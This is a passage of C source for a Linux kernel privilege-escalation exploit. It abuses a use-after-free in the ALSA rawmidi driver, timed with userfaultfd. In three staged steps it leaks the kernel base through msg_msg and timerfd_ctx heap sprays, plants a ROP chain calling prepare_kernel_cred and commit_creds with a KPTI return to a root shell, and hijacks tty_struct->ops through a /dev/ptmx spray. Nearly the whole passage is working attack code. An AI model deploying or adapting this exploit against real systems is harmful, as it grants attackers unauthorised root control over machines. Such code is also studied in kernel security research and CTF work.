    rop[k++] = kernel_base + 0x15e8; // pop rdi ; ret
    rop[k++] = 0x0;
    rop[k++] = kernel_base + 0x8a800; // prepare_kernel_cred
    rop[k++] = kernel_base + 0x49fb8; // pop rdx ; ret
    rop[k++] = 0x8;
    rop[k++] = kernel_base + 0xa6b081; // cmp rdx, 8 ; jne 0xffffffff81a6b05e ; ret
    rop[k++] = kernel_base + 0x3dfdb4; // mov rdi, rax ; jne 0xffffffff813dfda1 ; xor eax, eax ; ret
    rop[k++] = kernel_base + 0x8a3c0; // commit_creds

    /* kpti trampoline */
    rop[k++] = kernel_base + 0xc00a45; // swapgs_restore_regs_and_return_to_usermode + 22
    rop[k++] = 0x0; // rax
    rop[k++] = 0x0; // rdi
    
    rop[k++] = (unsigned long)&getRootShell;
    rop[k++] = (unsigned long)usr_cs;
    rop[k++] = (unsigned long)usr_rflags;
    rop[k++] = (unsigned long)usr_sp;
    rop[k++] = (unsigned long)usr_ss;

    uint64_t *func_table = (uint64_t *)&buf[0x100];
    for (size_t i = 0; i < 12; i++)
    {
        if (i == 4)
        {
            *func_table++ = kernel_base + 0x1e; // ret;
            continue;
        }

        if (i == 5)
        {
            *func_table++ = kernel_base + 0x1e; // ret
            continue;
        }

        if (i == 6)
        {
            *func_table++ = kernel_base + 0x1e; // ret
            continue;
        }

        *func_table++ = 0xdeadbeefdeadbe00 + i;
    }

    *func_table = pivot;
}

void pin_cpu(long cpu_id)
{
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(cpu_id, &mask);

    if (sched_setaffinity(0, sizeof(mask), &mask) == -1)
    {
        err("`sched_setaffinity()` failed: %s", strerror(errno));
    }

    return;
}

void main(void)
{
    pin_cpu(0);

    struct snd_rawmidi_params srp;

    save_state();

    /* ===================== [ SETP 1 - KASLR Leak ] ===================== */

    puts("[+] STEP 1 : KASLR leak");
    fd1 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd1 < 0)
    {
        perror("[-] open");
        exit(0);
    }

    puts("[+] Opening rawmidi");

    int qid[2];
    if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
    {
        perror("msgget");
        exit(1);
    }

    struct itimerspec its;

    its.it_interval.tv_sec = 0;
    its.it_interval.tv_nsec = 0;
    its.it_value.tv_sec = 9999;
    its.it_value.tv_nsec = 0;

    int tfd[256];

    for(int i = 0; i < 256 / 2; i++)
    {
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);
        timerfd_settime(tfd[i], 0, &its, 0);
    }

    if ((page = mmap((void *)0x1336000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
    {
        perror("[-] mmap()");
        exit(0);
    }

    puts("[+] Mapping two pages");

    char *addr = page;
    memset(addr, 'A', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT1);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */
    pthread_create(&thread[0], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 256 */
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;
    srp.buffer_size = 240;
    srp.avail_min = 1;
    uint64_t err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by size 256");

    if (err < 0)
    {
        perror("[-] ioctl");
        exit(0);	
    }

    struct args_trigger args;
    args.addr = addr + PAGE_SIZE - 0x18;
    args.size = 0x18 + 0x8;
    args.fd= fd1;

    /* Blocking before object created by size 256 in userfault */
    pthread_create(&thread[1], NULL, (void *) trigger_userfaultfd, &args);
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 256 generating an UAF */
    srp.buffer_size = 250;
    err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 256 generating UAF");

    if (err < 0)
    {
        perror("[-] ioctl");
        exit(0);	
    }

    /* send_msg 'A' */
    char buf[0xf8 - 0x30];
    memset(buf, 0x41, sizeof(buf));
    send_msg(qid[0], buf, 0xf8, 1);

    puts("[+] Allocate msg_msg in kmalloc-256");

    printf("[*] Waiting for userfaultd to finish ..\n");
    release_page_fault = true;

    /* spray timerfd_ctx in kmalloc-256 */
    for(int i = 256 / 2; i < 256; i++)
    {
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);
        timerfd_settime(tfd[i], 0, &its, 0);
    }

    puts("[+] Allocate timerfd_ctx in kmalloc-256");

    while(release_page_fault == true);
    printf("[+] Page fault lock released\n");

    uint64_t *leak = recv_msg(qid[0], 0x2000);

    // hexdump(leak, 0x2000);

    timerfd_tmrproc =  *(leak + (0x200 / sizeof(uint64_t)));
    kernel_base = timerfd_tmrproc - 0x2201f0;
    pivot = kernel_base + 0x8fc625; // push r8 ; add byte ptr [rbp + 0x41], bl ; pop rsp ; pop r13 ; ret

    printf("[+] timerfd_tmrproc addr : 0x%lx\n", timerfd_tmrproc);
    printf("[+] kernel_base addr : 0x%lx\n", kernel_base);
    printf("[+] pivot addr : 0x%lx\n", pivot);

    for(int i = 0; i < 256; i++)
    {
        close(tfd[i]);
    }

    close(fd1);
    puts("[+] Close rawmidi");

    /* ===================== [ SETP 2 - SMAP Bypass ] ===================== */

    puts("\n[+] STEP 2 : SMAP bypass");
    
    release_page_fault = false;

    fd2 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd2 < 0)
    {
        perror("[-] open");
        exit(0);
    }

    puts("[+] Opening rawmidi");

    if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
    {
        perror("msgget");
        exit(1);
    }

    if ((page = mmap((void *)0x3330000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
    {
        perror("[-] mmap()");
        exit(0);
    }

    puts("[+] Mapping two pages");

    addr = page;
    memset(addr, 'B', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT2);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */
    pthread_create(&thread[2], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 512 */
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;
    srp.buffer_size = 500;
    srp.avail_min = 1;
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by size 512");

    if (err < 0)
    {
        perror("[-] ioctl");
        exit(0);	
    }
    args.addr = addr + PAGE_SIZE - 0x18;
    args.size = 0x18 + 0x8;
    args.fd= fd2;

    /* Blocking before object created by size 512 in userfault */
    pthread_create(&thread[3], NULL, (void *) trigger_userfaultfd, &args);
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 512 generating an UAF */
    srp.buffer_size = 90;
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 512 generating UAF");

    if (err < 0)
    {
        perror("[-] ioctl");
        exit(0);	
    }

    /* rop spray in kmalloc-512 */
    char secondary_buf[0x1ea - 0x30];
    memset(secondary_buf, 0, sizeof(secondary_buf));
    build_rop(secondary_buf);

    printf("[*] Waiting for userfaultd to finish ..\n");
    release_page_fault = true;

    for(int i = 0; i < 0x20; i++)
    {
        send_msg(qid[1], secondary_buf, 0x1ea, 0x1337);
    }

    puts("[+] Spray ROP Chain in kmalloc-512");

    while(release_page_fault == true);
    printf("[+] Page fault lock released\n");

    uint64_t *leak2 = recv_msg(qid[1], 0x2000);
    next = *(leak2 + (0x1d8 / sizeof(uint64_t))) + 0x30;
    fake_table = next + 0x100;

    printf("[+] msg_msg->m_list.next leak : 0x%lx\n", next - 0x30);
    printf("[+] Fake tty_struct->ops function table: 0x%lx\n", fake_table);

    // hexdump(leak2, 0x2000);

    close(fd2);
    puts("[+] Close rawmidi");

    /* ===================== [ SETP 3 - tty_struct->ops overwrite ] ===================== */

    puts("\n[+] STEP 3 : Fake tty_struct->ops overwrite");

    release_page_fault = false;

    fd3 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd3 < 0)
    {
        perror("[-] open");
        exit(0);
    }

    puts("[+] Re-opening rawmidi");

    if ((page = mmap((void *)0x5550000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
    {
        perror("[-] mmap()");
        exit(0);
    }

    puts("[+] Mapping two pages");

    addr = page;
    memset(addr, 'C', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT3);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */
    pthread_create(&thread[4], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 800 */
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;
    srp.buffer_size = 800;
    srp.avail_min = 1;
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by kmalloc-1024");

    if (err < 0)
    {
        perror("[-] ioctl");
        exit(0);	
    }

    args.addr = addr + PAGE_SIZE - 0x18;
    args.size = 0x18 + 0x8;
    args.fd= fd3;

    /* Blocking before object created by size 1024 in userfault */
    pthread_create(&thread[5], NULL, (void *) trigger_userfaultfd, &args);
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 1024 generating an UAF */
    srp.buffer_size = 90;
    err = ioctl(fd3, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 1024 generating UAF");

    if (err < 0)
    {
        perror("[-] ioctl");
        exit(0);	
    }

    int spray[256];

    /* tty_struct spray */
    for(int i = 0; i < 256; i++)
    {
        spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);

        if(spray[i] < 0)
        {
            printf("[-] Failed open /dev/ptmx\n");
        }
    }

    puts("[+] Allocate tty_struct in kmalloc-1024");

    release_page_fault = true;

    while(release_page_fault == true);
    puts("[+] Page fault lock released");

    for(int i = 0; i < 256; i++)
    {
        ioctl(spray[i], 0, next - 8);
    }
}


References